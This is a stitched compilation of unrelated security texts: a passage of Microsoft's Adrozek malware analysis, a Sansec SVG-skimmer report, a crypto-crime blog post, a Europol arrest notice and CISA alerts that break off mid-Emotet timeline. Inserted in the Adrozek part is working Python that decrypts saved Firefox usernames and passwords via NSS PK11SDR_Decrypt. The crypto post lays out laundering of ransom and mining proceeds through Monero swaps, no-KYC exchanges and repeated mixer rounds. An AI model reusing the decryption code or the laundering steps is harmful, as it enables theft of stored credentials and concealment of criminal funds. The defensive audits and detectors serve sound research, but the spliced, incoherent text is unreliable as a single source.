| browser_action_visible | false | Plugin not visible in the browser toolbar |
| extension_can_script_all_urls | true | Allows the extension to script on all URLs without explicit permission |
| incognito | true | The extension can run in incognito mode |
| safebrowsing | false | Turns off safe browsing |

The screenshot below shows the permissions added to the Secure Preferences file:

Figure 10. Permissions added to the Secure Preferences file
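As an added example (not Microsoft's or Chromium's code), the Python below models the Secure Preferences integrity scheme described above, an HMAC per entry plus a super_mac over the HMAC table, and audits a document both for HMAC mismatches and for the values in the table, so tampering is still caught when the HMACs have been recomputed or the browser's own check has been patched out. The HMAC message format, the seed, the device ID and the preference paths are assumptions constructed for the demo, not Chromium's exact serialization.

```python
"""Audit a Chromium-style Secure Preferences document for tampering.

Added example, not Microsoft's or Chromium's code. The MAC construction below
(HMAC-SHA256 over device_id + dotted path + compact JSON of the value, plus a
super_mac over the MAC table) is a simplified model of the scheme the post
describes, not Chromium's exact serialization. Seed, device ID, paths and
preference values are constructed for the demo.
"""
import hashlib
import hmac
import json

# Values Adrozek writes, per the table above: leaf key -> value it sets.
RISKY_VALUES = {
    "browser_action_visible": False,
    "extension_can_script_all_urls": True,
    "incognito": True,
    "safebrowsing": False,
}

SEED = "constructed-seed-not-a-real-chromium-seed"   # constructed
DEVICE_ID = "constructed-device-id"                   # constructed
EXT_ID = "fcppdfelojakeahklfgkjegnpbgndoch"           # extension ID from the table above


def _leaves(node, prefix=""):
    """Yield (dotted_path, value) for every leaf of a nested dict."""
    if isinstance(node, dict) and node:
        for key, child in node.items():
            yield from _leaves(child, f"{prefix}{key}.")
    else:
        yield prefix.rstrip("."), node


def _mac(seed, device_id, path, value):
    msg = device_id + path + json.dumps(value, sort_keys=True, separators=(",", ":"))
    return hmac.new(seed.encode(), msg.encode(), hashlib.sha256).hexdigest().upper()


def _super_mac(seed, device_id, macs):
    msg = device_id + json.dumps(macs, sort_keys=True)
    return hmac.new(seed.encode(), msg.encode(), hashlib.sha256).hexdigest().upper()


def sign(prefs, seed, device_id):
    """Build a document with one MAC per entry and a super_mac over the MAC table."""
    macs = {path: _mac(seed, device_id, path, value) for path, value in _leaves(prefs)}
    return {"prefs": prefs,
            "protection": {"macs": macs, "super_mac": _super_mac(seed, device_id, macs)}}


def verify(doc, seed, device_id):
    """Return (super_mac_ok, paths whose MAC is missing or does not match)."""
    macs = doc["protection"]["macs"]
    super_ok = hmac.compare_digest(_super_mac(seed, device_id, macs),
                                   doc["protection"]["super_mac"])
    bad = [path for path, value in _leaves(doc["prefs"])
           if not hmac.compare_digest(macs.get(path, ""), _mac(seed, device_id, path, value))]
    return super_ok, bad


def find_risky_settings(prefs):
    """Paths whose leaf key and value match what Adrozek sets, regardless of MACs."""
    hits = []
    for path, value in _leaves(prefs):
        key = path.rsplit(".", 1)[-1]
        if key in RISKY_VALUES and value is RISKY_VALUES[key]:
            hits.append(path)
    return sorted(hits)


def audit(doc, seed, device_id):
    """MAC check plus content check; the content check still works when the
    browser's own check has been patched out (Figure 9) or the MACs resigned."""
    super_ok, bad = verify(doc, seed, device_id)
    return {"super_mac_ok": super_ok, "tampered": bad,
            "risky": find_risky_settings(doc["prefs"])}


# Constructed clean profile: safe browsing on, extension with default permissions.
CLEAN_PREFS = {
    "safebrowsing": True,
    "extensions": {"settings": {EXT_ID: {
        "browser_action_visible": True,
        "extension_can_script_all_urls": False,
        "incognito": False,
    }}},
}
CLEAN_DOC = sign(CLEAN_PREFS, SEED, DEVICE_ID)


def tampered_copy(doc, resign_seed=None, device_id=DEVICE_ID):
    """Test fixture applying the table's changes. Without resign_seed the MACs are
    left stale (a modifier that has disabled the check need not update them); with
    it the MACs are recomputed, as older modifiers that knew the seed did."""
    prefs = json.loads(json.dumps(doc["prefs"]))  # deep copy
    ext = prefs["extensions"]["settings"][EXT_ID]
    ext.update({"browser_action_visible": False,
                "extension_can_script_all_urls": True, "incognito": True})
    prefs["safebrowsing"] = False
    if resign_seed is not None:
        return sign(prefs, resign_seed, device_id)
    return {"prefs": prefs, "protection": doc["protection"]}


if __name__ == "__main__":
    for label, d in [("clean", CLEAN_DOC),
                     ("stale MACs", tampered_copy(CLEAN_DOC)),
                     ("resigned", tampered_copy(CLEAN_DOC, resign_seed=SEED))]:
        print(label, json.dumps(audit(d, SEED, DEVICE_ID), indent=1))
```

Note that in the stale-MAC case the super_mac still verifies, because it covers only the MAC table and not the edited values; the per-entry MACs are what flag the change, and once those have been resigned only the content scan does.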

On Mozilla Firefox, Adrozek modifies the following security settings:

| Modified file name | Content | Purpose |
|---|---|---|
| prefs.js | user_pref("app.update.auto", false); user_pref("app.update.enabled", false); user_pref("app.update.service.enabled", false) | Turn off updates |
| extensions.json | (appends details about the malicious extension) | Register the extension to the browser |
| Omni.ja (XPIDatabase.jsm module) | isNewInstall = false | Load the extension |

Browser updates

To prevent the browsers from being updated with the latest versions, which could restore modified settings and components, Adrozek adds a policy to turn off updates.

Figure 11. Policy added to turn off updates

Persistence

In addition to modifying browser settings and components, Adrozek also changes several system settings to gain even more control of the compromised device. It stores its configuration parameters at the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\<programName>. The ‘tag’ and ‘did’ entries contain the command-line arguments that it uses to launch the main payload. More recent variants of Adrozek use random characters instead of ‘tag’ or ‘did’.

Figure 12. Registry entries with command-line arguments that launch the main payload

To maintain persistence, the malware creates a service named “Main Service”.

Figure 13. Service created to maintain persistence

Ad injection

After tampering with multiple browser components and settings, the malware gains the capability to inject ads on search results on affected browsers. The injection of ads is performed by malicious scripts downloaded from remote servers.

Depending on the search keyword, the scripts insert related ads above the legitimate ads and search results. The number of ads inserted and the sites they point to vary. While we have not seen these ads point to malware-hosting or other malicious sites, the attackers can presumably make that change at any time. The Adrozek operators, however, behave like other browser modifiers: they earn through affiliate ad programs, which pay for referral traffic to certain websites.

Figure 14. Comparison of search results pages on an unaffected machine and one with Adrozek running

Credential theft

On Mozilla Firefox, Adrozek takes things further. It makes the most of its foothold by performing credential theft. It downloads an additional randomly named .exe file, which collects device information and the currently active username. It sends this information to the attacker.

Figure 15. Additional executable file written to the %temp% folder

It then starts locating specific files, including logins.json. On Mozilla Firefox this file, located at %APPDATA%\Mozilla\Firefox\Profiles\<profile>\logins.json, stores the browser's saved logins with the username and password fields encrypted (browsing history is kept separately, in places.sqlite).

Figure 16. JSON file containing stolen credentials

The malware looks for the keys encryptedUsername and encryptedPassword to locate the encrypted data. It then decrypts the data using the function PK11SDR_Decrypt() exported by the NSS library (nss3.dll) that ships with Firefox, and sends the result to the attackers. Because the decryption key lives in the profile's key database, any process running as the user can do this without a prompt unless a primary (master) password has been set.
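The lookup and decryption steps described above, as an added Python example (not code from the Microsoft post). It parses a logins.json, pulls out the encryptedUsername and encryptedPassword fields, checks that they are base64 DER blobs of the kind NSS produces, and, if a Firefox profile directory is supplied and the NSS library can be loaded, decrypts them through PK11SDR_Decrypt via ctypes, which is exactly what a local process can do when no primary password is set. The sample logins.json is constructed (its ciphertext is a placeholder and will not decrypt); the profile path in FIREFOX_PROFILE and the library name (libnss3.so, or nss3.dll from the Firefox install directory on Windows) are assumptions the reader supplies.

```python
"""Extract and (optionally) decrypt the fields the write-up says Adrozek
targets in a Firefox logins.json. Added example, not code from the Microsoft
post. The sample logins.json is constructed and its ciphertext is a placeholder
that will not decrypt; the profile path (FIREFOX_PROFILE) and the NSS library
name are assumptions the reader supplies for a real profile."""
import base64
import ctypes
import json
import os
import sys


def extract_encrypted_logins(text):
    """Return (hostname, encryptedUsername, encryptedPassword) per saved login."""
    doc = json.loads(text)
    return [(e["hostname"], e["encryptedUsername"], e["encryptedPassword"])
            for e in doc.get("logins", [])
            if "encryptedUsername" in e and "encryptedPassword" in e]


def looks_like_sdr_blob(b64):
    """PK11SDR output is a base64 DER SEQUENCE (first byte 0x30) holding the
    key id, the algorithm and the ciphertext; anything else is not one."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except ValueError:
        return False
    return len(raw) > 2 and raw[0] == 0x30


class SECItem(ctypes.Structure):
    """NSS SECItem: { SECItemType type; unsigned char *data; unsigned int len; }"""
    _fields_ = [("type", ctypes.c_uint),
                ("data", ctypes.POINTER(ctypes.c_ubyte)),
                ("len", ctypes.c_uint)]


def nss_decrypt(profile_dir, blobs, libname=None):
    """Decrypt base64 SDR blobs with NSS initialised on the profile's key4.db.
    Succeeds without any prompt when no primary password is set, which is what
    lets a local process such as Adrozek read the stored credentials."""
    libname = libname or ("nss3.dll" if sys.platform == "win32" else "libnss3.so")
    nss = ctypes.CDLL(libname)
    nss.NSS_Init.argtypes = [ctypes.c_char_p]
    nss.PK11SDR_Decrypt.argtypes = [ctypes.POINTER(SECItem), ctypes.POINTER(SECItem),
                                    ctypes.c_void_p]
    nss.SECITEM_ZfreeItem.argtypes = [ctypes.POINTER(SECItem), ctypes.c_int]
    if nss.NSS_Init(("sql:" + profile_dir).encode()) != 0:
        raise RuntimeError("NSS_Init failed for " + profile_dir)
    out = []
    try:
        for b64 in blobs:
            raw = base64.b64decode(b64)
            buf = (ctypes.c_ubyte * len(raw)).from_buffer_copy(raw)
            inp = SECItem(0, ctypes.cast(buf, ctypes.POINTER(ctypes.c_ubyte)), len(raw))
            res = SECItem()
            if nss.PK11SDR_Decrypt(ctypes.byref(inp), ctypes.byref(res), None) != 0:
                out.append(None)   # wrong profile, or a primary password is set
                continue
            out.append(ctypes.string_at(res.data, res.len).decode("utf-8", "replace"))
            nss.SECITEM_ZfreeItem(ctypes.byref(res), 0)
    finally:
        nss.NSS_Shutdown()
    return out


# Constructed sample; the blobs are DER-shaped placeholders, not real ciphertext.
_PLACEHOLDER = base64.b64encode(b"\x30\x0e\x04\x0c" + b"\x00" * 12).decode()
SAMPLE_LOGINS_JSON = json.dumps({
    "nextId": 2,
    "logins": [{"id": 1, "hostname": "https://mail.example.org",
                "encryptedUsername": _PLACEHOLDER, "encryptedPassword": _PLACEHOLDER,
                "guid": "{00000000-0000-0000-0000-000000000000}", "encType": 1}],
})

if __name__ == "__main__":
    for host, user_blob, pw_blob in extract_encrypted_logins(SAMPLE_LOGINS_JSON):
        print(host, looks_like_sdr_blob(user_blob), looks_like_sdr_blob(pw_blob))
    profile = os.environ.get("FIREFOX_PROFILE")   # assumption: operator-supplied path
    if profile:
        with open(os.path.join(profile, "logins.json"), encoding="utf-8") as fh:
            entries = extract_encrypted_logins(fh.read())
        blobs = [b for _, u, p in entries for b in (u, p)]
        print(nss_decrypt(profile, blobs))
```

The defensive point is the last branch: with a primary password set, PK11SDR_Decrypt fails (the None entries) instead of handing the plaintext to whatever process asks, so that setting, plus monitoring for non-Firefox processes opening logins.json and key4.db, is the practical mitigation for this stage of the attack.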

With this additional function, Adrozek sets itself apart from other browser modifiers and demonstrates that there is no such thing as a low-priority or non-urgent threat. Preventing the full range of threats from gaining access in the first place is of utmost importance.

Defending against sophisticated browser modifiers

Adrozek shows that even threats that are not thought of as urgent or critical are becoming more complex. While the malware's main goal is to inject ads and refer traffic to certain websites, the attack chain involves sophisticated behaviors that allow attackers to gain a strong foothold on a device. The addition of credential theft shows that attackers can expand their objectives to take advantage of the access they are able to gain.

These complex behaviors, and the fact that the campaign uses polymorphic malware, require protections that focus on identifying and detecting malicious behavior. Microsoft Defender Antivirus, the built-in endpoint protection solution on Windows 10, uses behavior-based, machine learning-powered detections to block Adrozek.

End users who find this threat on their devices are advised to re-install their browsers. Considering the massive infrastructure that was used to distribute this threat on the web, users should also educate themselves about preventing malware infections and the risks of downloading and installing software from untrusted sources and clicking ads or links on suspicious websites. Users should also take advantage of URL filtering solutions, such as Microsoft Defender SmartScreen on Microsoft Edge. Configuring security software to automatically download and install updates, as well as running the latest versions of the operating system and applications and deploying the latest security updates help harden endpoints from threats.

For enterprises, defenders should look to reduce the attack surface for these types of threats. Application control allows organizations to enforce the use of only authorized apps and services. Enterprise-grade browsers like Microsoft Edge provide additional security features like conditional access and Application Guard that defend against threats on the browser.

It's also important for enterprises to gain deep visibility into malicious behaviors on endpoints and the capability to correlate with threat data from other domains like cloud apps, email and data, and identities. Microsoft 365 Defender delivers coordinated protection across domains and provides rich investigation tools that empower defenders to respond to attacks. Learn how your organization can stop attacks through automated, cross-domain security and built-in AI with Microsoft 365 Defender.

 

Microsoft 365 Defender Research Team

 

 


The post Widespread malware campaign seeks to silently inject ads into search results, affects multiple browsers appeared first on Microsoft Security.

Clever tactic:

This new malware was discovered by researchers at Sansec, a Dutch cyber-security company that focuses on defending e-commerce websites from digital skimming (Magecart) attacks.

The payment skimmer pulls off its sleight of hand with a double-payload structure: the source code of the skimmer script that steals customers' credit card data is concealed inside a social-sharing icon, loaded as an HTML 'svg' element with a 'path' element serving as the container.

The syntax used to hide the skimmer's source code mimics a legitimate social media button, with the 'svg' element named after a social media platform (e.g., facebook_full, twitter_full, instagram_full, youtube_full, pinterest_full, and google_full).

A separate decoder, deployed somewhere else on the e-commerce site's server, extracts and executes the hidden credit card stealer.

This tactic increases the chances of avoiding detection even if one of the two malware components is found since the malware loader is not necessarily stored within the same location as the skimmer payload and their true purpose might evade superficial analysis.
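A heuristic scan for the hiding place described above, added here as an example (not Sansec's detector). It parses the HTML of a page, collects every svg and its path children, and flags a path whose 'd' attribute contains anything outside the SVG path grammar or that carries text content, which a genuine icon never has; it also notes whether the svg is named after a social network the way the article describes. The HTML snippets are constructed, and the base64-looking text in one of them is a placeholder, not a real skimmer.

```python
"""Heuristic scan for the hiding place the article describes: <svg> elements
named like social-sharing icons whose <path> carries something other than
path data. Added example, not Sansec's detector; the HTML below is constructed
and the base64-looking text in it is a placeholder, not a real skimmer."""
import re
from html.parser import HTMLParser

# A legitimate 'd' attribute holds only path commands, numbers and separators.
PATH_DATA_RE = re.compile(r"^[MmZzLlHhVvCcSsQqTtAa0-9.,\s\-+eE]*$")
SOCIAL_NAME_RE = re.compile(
    r"(facebook|twitter|instagram|youtube|pinterest|google)_full", re.I)


class SvgPathCollector(HTMLParser):
    """Collect each <svg>'s id/class and the 'd' and text of its <path> children."""

    def __init__(self):
        super().__init__()
        self.svgs = []
        self._svg = None
        self._in_path = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "svg":
            self._svg = {"name": a.get("id") or a.get("class") or "", "paths": []}
        elif tag == "path" and self._svg is not None:
            self._svg["paths"].append({"d": a.get("d") or "", "text": ""})
            self._in_path = True

    def handle_data(self, data):
        if self._in_path and self._svg is not None and self._svg["paths"]:
            self._svg["paths"][-1]["text"] += data

    def handle_endtag(self, tag):
        if tag == "path":
            self._in_path = False
        elif tag == "svg" and self._svg is not None:
            self.svgs.append(self._svg)
            self._svg = None


def suspicious_svgs(html):
    """Return a finding per <path> that is not plain path data: either its 'd'
    contains characters outside the SVG path grammar or it has text content.
    'social_name' marks the naming mimicry the article describes."""
    parser = SvgPathCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for svg in parser.svgs:
        for path in svg["paths"]:
            bad_d = PATH_DATA_RE.match(path["d"]) is None
            has_text = path["text"].strip() != ""
            if bad_d or has_text:
                findings.append({
                    "svg": svg["name"],
                    "social_name": SOCIAL_NAME_RE.search(svg["name"]) is not None,
                    "reason": "non-path characters in d" if bad_d else "text inside <path>",
                })
    return findings


# Constructed snippets (not from a compromised site).
BENIGN_ICON = ('<a href="#"><svg id="facebook_full" viewBox="0 0 24 24">'
               '<path d="M22 12c0-5.5-4.5-10-10-10S2 6.5 2 12s4.5 10 10 10"/></svg></a>')
HIDDEN_IN_TEXT = ('<a href="#"><svg id="google_full" viewBox="0 0 24 24">'
                  '<path d="M12 2a10 10 0 1 0 0 20">dmFyIGE9ZG9jdW1lbnQuZm9ybXM7</path>'
                  '</svg></a>')
HIDDEN_IN_D = '<svg class="twitter_full"><path d="(function(){/*placeholder*/})()"/></svg>'

if __name__ == "__main__":
    for label, html in [("benign", BENIGN_ICON), ("text", HIDDEN_IN_TEXT), ("d", HIDDEN_IN_D)]:
        print(label, suspicious_svgs(html))
```

Run it over the rendered HTML of checkout and cart pages rather than the templates on disk: the skimmer and its decoder are described as living in different places on the server, so a template-by-template review can miss the pairing that the served page reveals.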


With government money printers going brrr extra hard during the Covid-19 pandemic, people are newly reminded of the fraud that is fiat. The latest crypto bull run is creating fear of missing out among malware peddlers as well. Brace yourself for the next round of mining malware and crypto ransomware.

The last crypto bull run in 2017 saw an increase in the utility of cryptocurrency for malicious actors. Coins of the popular cryptocurrencies come into existence through so-called mining, which requires computational power. Mining allows a compromised machine to turn a profit regardless of who it belongs to and what its business function is. There is no need to target security-critical, well-protected hosts, and no further movement in the compromised host's network is required, creating a low bar of entry for hackers seeking mining profits. Otherwise unattractive hosts running old, unpatched software and handling "boring" data from a hacker's perspective can become worth compromising as crypto prices rise.

Another way to obtain coins is through extortion. Possible ways to gain leverage on a person or company would be to obtain sensitive information which they need to keep confidential or to threaten business critical infrastructure. Examples for suitable attack angles on infrastructure include wide scale encryption of data or classical network-based denial of service.

How it Works

When a miner mines a valid block, they receive a block reward. The block prepared by a miner, contains the miner’s address to which the block reward will be sent. Small miners do not have the resources to reliably mine blocks on their own. That’s why they join mining pools which distribute received block rewards to the participants based on their contribution.

In the case of extortion, the victim is given an address to which to send crypto funds. In the past, obtaining and sending crypto, with all its unknowns and difficulties, posed a significant obstacle to people and companies alike. As with purchases of any kind, the easier it is to pull the trigger and conclude a payment, the more likely a person is to go through with it. This is purely a UX problem, and one that is continuously improving: nowadays it is fairly straightforward to obtain the crypto funds needed to pay a ransom.

Countermeasures

Assuming the attacker's leverage is too great not to pay the ransom, or the illegal mining operation has already been running for some time, what options are left to entities such as law enforcement after a transaction has taken place? One possibility is to follow the money. Bitcoin, for example, is very transparent when it comes to transaction flow: the sender, recipient and amount of every Bitcoin transaction are publicly available in the blockchain, so any transaction can be traced if either the sender or the recipient address is known. In the case of extortion the address is of course known. If mining malware is used, it can be reverse engineered to find the address to which mined Bitcoin are sent; if that address belongs to a mining pool, the pool can be pressured to reveal the payout address registered for the machines found running the malware. It may still not be possible to link the address where the illegally obtained Bitcoin accumulated to the people controlling it. A Bitcoin address is derived from the public half of a key pair, and neither the address nor the public key inherently divulges anything about the holder of the private key, i.e. the person who controls the Bitcoin at that address.

At some point, actors will want to use their crypto coins in real world purchases. If, for example, a car is purchased with the tainted Bitcoin, the Bitcoin transaction is visible on the blockchain. Whoever goes to either pick up the car or the car is delivered to, will at least be placed under great suspicion by law enforcement.

Purchasing goods directly in crypto is not widely possible yet, so for the time being, a conversion to fiat needs to take place. Various challenges can arise after converting crypto to government-controlled money and these are outside of this article’s scope. The conversion can be done with anyone who wants to purchase crypto for fiat, but commonly takes place on centralized crypto exchanges. These provide a marketplace where buyers and sellers meet and support even fairly large volumes. The daily trade volume of a top 5 crypto exchange ranges between 1 and 3 billion USD. To trade on a centralized crypto exchange, the crypto needs to be transferred to an exchange-controlled address, i.e. the owner loses custody of his crypto. The exchange is a choke point on which law enforcement can exert pressure for funds to be seized. Furthermore, trading significant amounts requires prior user identification, also called KYC (Know Your Customer).

There are also decentralized exchanges, which essentially only do order book matching and where users do not lose custody of their assets and do not need to go through a KYC process. These work in a variety of ways. At the time of writing, they are slower and more expensive than centralized exchanges. The conversion to fiat is also not straightforward and requires purchasing USD-backed tokens called stablecoins. The topic of decentralized exchanges goes beyond the scope of this article and is not elaborated upon further here.

Essentially, the problems with illegally obtained crypto are currently similar to those already faced by any entity handling substantial amounts of illicit funds in fiat.

Laundering the Crypto

A viable method to cover one’s tracks is to change to another crypto currency. Not all crypto currencies share Bitcoin’s transaction flow transparency. Monero for example, is specifically designed with privacy in mind. Illegally obtained Bitcoin can be converted to Monero at various exchange services without any registration. A common workflow is to supply the desired currency and address, in our case Monero and deposit the Bitcoin to an address designated by the exchange service. These often operate out of countries which do not pressure them to implement KYC. Liquidity can however be an issue with these. In any case, small amounts can be exchanged at a time to avoid larger losses and conversions can be spread out across a number of such exchange sites to avoid liquidity problems. Once in the Monero world, the money is squeaky clean. The Monero blockchain obscures the sender, the amount, and the recipient of transactions. From here Monero can be converted back to any other crypto currency or sold for fiat at a centralized exchange where the identity of the malicious actor is known.

Another way of obfuscating coin origins is through coin mixers, also called tumblers. Multiple participants typically put the same amount of crypto into the tumbler, after which these inputs are mixed and redistributed to new addresses, cutting the linkage between input and output addresses. With Chaumian CoinJoin this can be implemented in a zero-trust fashion, where no participant has to trust either the mixer or any other participant; the Wasabi wallet conveniently implements it. Depending on the taint level of the coins to be mixed and one's moral disposition, a drawback could be that less dirty coins, gained from mining malware for example, are mixed with coins associated with much dirtier activity such as human trafficking or child pornography. Running several consecutive mixes alleviates the taint problem by further obscuring the origins of all mixed coins.
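The follow-the-money walk from the Countermeasures section, and the effect of an equal-output CoinJoin on it, as an added Python example (not part of the original article). It walks forward from a known extortion address over a small transaction graph until the funds reach an address in a known exchange cluster, the choke point the text describes, and marks any path that crossed a group of identical outputs, where the walk can no longer say which output belongs to the extortionist. The transactions, addresses and the exchange cluster are constructed, not blockchain data; in practice the cluster comes from address clustering or exchange intelligence.

```python
"""Follow-the-money over a constructed transaction graph: walk forward from a
known extortion address until the funds land on an address in a known exchange
cluster, and mark hops that passed through an equal-output CoinJoin, where the
walk can no longer say which output is the extortionist's. Added example; the
transactions, addresses and the exchange cluster are made up, not blockchain data."""
from collections import deque

# txid -> {"in": [addresses spent], "out": [(address, amount in BTC)]}
TXS = {
    "tx1": {"in": ["ransom_addr"], "out": [("hop1", 4.9), ("change1", 0.1)]},
    "tx2": {"in": ["hop1"], "out": [("hop2", 4.85)]},
    # tx3: three spenders, three identical 1.0 BTC outputs: CoinJoin-shaped
    "tx3": {"in": ["hop2", "alice", "bob"],
            "out": [("m1", 1.0), ("m2", 1.0), ("m3", 1.0),
                    ("hop2_chg", 1.8), ("alice_chg", 0.2)]},
    "tx4": {"in": ["m2"], "out": [("exch_dep_7", 0.99)]},
    "tx5": {"in": ["hop2_chg"], "out": [("exch_dep_8", 1.79)]},
}
# Assumed deposit addresses of a KYC exchange (in practice from clustering/intel).
EXCHANGE_CLUSTER = {"exch_dep_7", "exch_dep_8"}


def spend_index(txs):
    """address -> txids that spend from it (the forward edges of the walk)."""
    idx = {}
    for txid, tx in txs.items():
        for addr in tx["in"]:
            idx.setdefault(addr, []).append(txid)
    return idx


def equal_output_addrs(tx, min_group=3):
    """Outputs whose amount is shared by at least min_group outputs: the
    signature of a CoinJoin round, where any of them could be the tainted one."""
    by_amount = {}
    for addr, amount in tx["out"]:
        by_amount.setdefault(amount, []).append(addr)
    return {a for addrs in by_amount.values() if len(addrs) >= min_group for a in addrs}


def trace(txs, seed):
    """Breadth-first forward taint from seed.
    Returns {address: (list of txids on the path, ambiguous)}; ambiguous is True
    once the path crossed an equal-output group. Every output of a tx that spends
    tainted coins is marked, so other participants' change (alice_chg here) is
    swept up too; pruning that needs amount matching, which is out of scope."""
    idx = spend_index(txs)
    seen = {seed: ([], False)}
    queue = deque([seed])
    while queue:
        addr = queue.popleft()
        path, ambiguous = seen[addr]
        for txid in idx.get(addr, []):
            mixed = equal_output_addrs(txs[txid])
            for out_addr, _ in txs[txid]["out"]:
                if out_addr in seen:
                    continue
                seen[out_addr] = (path + [txid], ambiguous or out_addr in mixed)
                queue.append(out_addr)
    return seen


def exchange_hits(tainted, cluster):
    """Tainted addresses inside the exchange cluster: where a records request
    or seizure can be directed, with a flag for weak attribution."""
    return {a: info for a, info in tainted.items() if a in cluster}


if __name__ == "__main__":
    result = trace(TXS, "ransom_addr")
    for addr, (path, ambiguous) in exchange_hits(result, EXCHANGE_CLUSTER).items():
        print(addr, " -> ".join(path), "ambiguous" if ambiguous else "direct")
```

In the sample, exch_dep_8 is reached through hop2's change output and attribution holds, while exch_dep_7 is reached through m2, one of three identical outputs, so the exchange could just as well be receiving Alice's or Bob's coins; that is the ambiguity a mixer buys, and chaining several rounds compounds it.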

Conclusion

With the upcoming crypto bull run the profitability of the attacks described above is bound to increase. Security controls should be considered and/or be put in place to mitigate this threat.

Publication date: 11/20/2020

Two Romanian citizens have been arrested for allegedly running the malware encryption services, CyberSeal and Dataprotector, to avoid detection of antivirus software, and the Cyberscan service to test malware against antiviruses.

These services have been offered in the underground market since 2010 for no more than $300 per license, with regular updates and customer support. They have been used by more than 1,560 cybercriminals with different types of malware.

The police operation, coordinated by the European Cybercrime Centre (EC3), resulted in several house searches in Bucharest and Craiova, and the neutralisation of their backend infrastructure in Romania, Norway and the USA.


Tags:
Cybercrime, Encryption, Incident, Internet, Malware, Other critical infrastructures

References:

Romanian duo arrested for running malware encryption service to bypass antivirus software. europol.europa.eu, 20/11/2020 (English). https://www.europol.europa.eu/newsroom/news/romanian-duo-arrested-for-running-malware-encryption-service-to-bypass-antivirus-software
Romanians arrested for running underground malware services. securityaffairs.co, 22/11/2020 (English). https://securityaffairs.co/wordpress/111270/cyber-crime/police-shutdown-malware-services.html
Arrestan a dos ciudadanos Rumanos por ejecutar servicios de malware. seguridadyfirewall.cl, 23/11/2020 (Spanish). https://www.seguridadyfirewall.cl/2020/11/la-policia-rumana-arresto-dos.html


Andy Greenberg from Wired wrote an article, “How 30 lines of code blew up a 27-ton generator,” about the March 3, 2007 Aurora demonstration. Aurora is not a malware event, but rather a gap in protection of the electric grid. That is, Aurora is a protective relay problem not a malware issue so there were NO lines of code that damaged the 27-ton generator. Aurora needs to be addressed quickly as it can be caused by any competent power system protection engineer and the information is publicly available.


Original release date: October 29, 2020

The Cybersecurity and Infrastructure Security Agency (CISA) and the Department of Defense (DOD) Cyber National Mission Force (CNMF) have identified a malware variant, referred to as Zebrocy, used by a sophisticated cyber actor. In addition, U.S. Cyber Command has released the malware sample to the malware aggregation tool and repository, VirusTotal.

CISA encourages users and administrators to review Malware Analysis Report MAR-10310246r1.v1 and U.S. Cyber Command’s VirusTotal page for more information.

This product is provided subject to this Notification and this Privacy & Use policy.


Original release date: October 29, 2020

The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Defense Cyber National Mission Force (CNMF) have identified a malware variant—referred to as ComRAT—used by the Russian-sponsored advanced persistent threat (APT) actor Turla. In addition, U.S. Cyber Command has released the malware sample to the malware aggregation tool and repository, VirusTotal.

CISA encourages users and administrators to review Malware Analysis Report MAR-10310246-2.v1 and U.S. Cyber Command’s VirusTotal page for more information.


Since 2016, the NJCCIC has gathered cyber threat intelligence information to develop specific threat profiles on Android malware, ATM malware, botnets, cryptocurrency-mining malware, exploit kits, industrial control systems (ICS) malware, iOS malware, macOS malware, point-of-sale malware, ransomware, and trojans.

Original release date: October 6, 2020

Summary

This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise framework for all referenced threat actor techniques.

This product was written by the Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing & Analysis Center (MS-ISAC).

Emotet—a sophisticated Trojan commonly functioning as a downloader or dropper of other malware—resurged in July 2020, after a dormant period that began in February. Since August, CISA and MS-ISAC have seen a significant increase in malicious cyber actors targeting state and local governments with Emotet phishing emails. This increase has rendered Emotet one of the most prevalent ongoing threats.

To secure against Emotet, CISA and MS-ISAC recommend implementing the mitigation measures described in this Alert, which include applying protocols that block suspicious attachments, using antivirus software, and blocking suspicious IPs.

Technical Details

Emotet is an advanced Trojan primarily spread via phishing email attachments and links that, once clicked, launch the payload (Phishing: Spearphishing Attachment [T1566.001], Phishing: Spearphishing Link [T1566.002]). The malware then attempts to proliferate within a network by brute forcing user credentials and writing to shared drives (Brute Force: Password Guessing [T1110.001], Valid Accounts: Local Accounts [T1078.003], Remote Services: SMB/Windows Admin Shares [T1021.002]).

Emotet is difficult to combat because of its “worm-like” features that enable network-wide infections. Additionally, Emotet uses modular Dynamic Link Libraries to continuously evolve and update its capabilities.

Since July 2020, CISA has seen increased activity involving Emotet-associated indicators. During that time, CISA’s EINSTEIN Intrusion Detection System, which protects federal, civilian executive branch networks, has detected roughly 16,000 alerts related to Emotet activity. CISA observed Emotet being executed in phases during possible targeted campaigns. Emotet used compromised Word documents (.doc) attached to phishing emails as initial insertion vectors. Possible command and control network traffic involved HTTP POST requests to Uniform Resource Identifiers consisting of nonsensical random length alphabetical directories to known Emotet-related domains or IPs with the following user agent string (Application Layer Protocol: Web Protocols [T1071.001]).

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; .NET CLR

Traffic to known Emotet-related domains or IPs occurred most commonly over ports 80, 8080, and 443. In one instance, traffic from an Emotet-related IP attempted to connect to a suspected compromised site over port 445, possibly indicating the use of Server Message Block exploitation frameworks along with Emotet (Exploitation of Remote Services [T1210]). Figure 1 lays out Emotet’s use of enterprise techniques.

 

Figure 1: MITRE ATT&CK enterprise techniques used by Emotet

 

Timeline of Activity

The following timeline identifies key Emotet activity observed in 2020.

February: Cybercriminals targeted non-U.S. countries using COVID-19-themed phishing emails to lure victims to download Emotet.[1]

July: Researchers spotted emails with previously used Emotet URLs, particularly those used in the February campaign, targeting U.S. businesses with COVID-19-themed lures.[2]

August:
Security researchers observed a 1,000 percent increase in downloads of the Emotet loader. Following this change, antivirus software firms adjusted their detection heuristics to compensate, leading to decreases in observed loader downloads.[3]
Proofpoint researchers noted mostly minimal changes in the tactics and tools previously used with Emotet. Significant changes included Emotet delivering Qbot affiliate partner01 as the primary payload, and the Emotet mail-sending module's ability to deliver both benign and malicious attachments.[4]
CISA and MS-ISAC observed increased attacks in the United States, particularly cyber actors using Emotet to target state and local governments.

September:
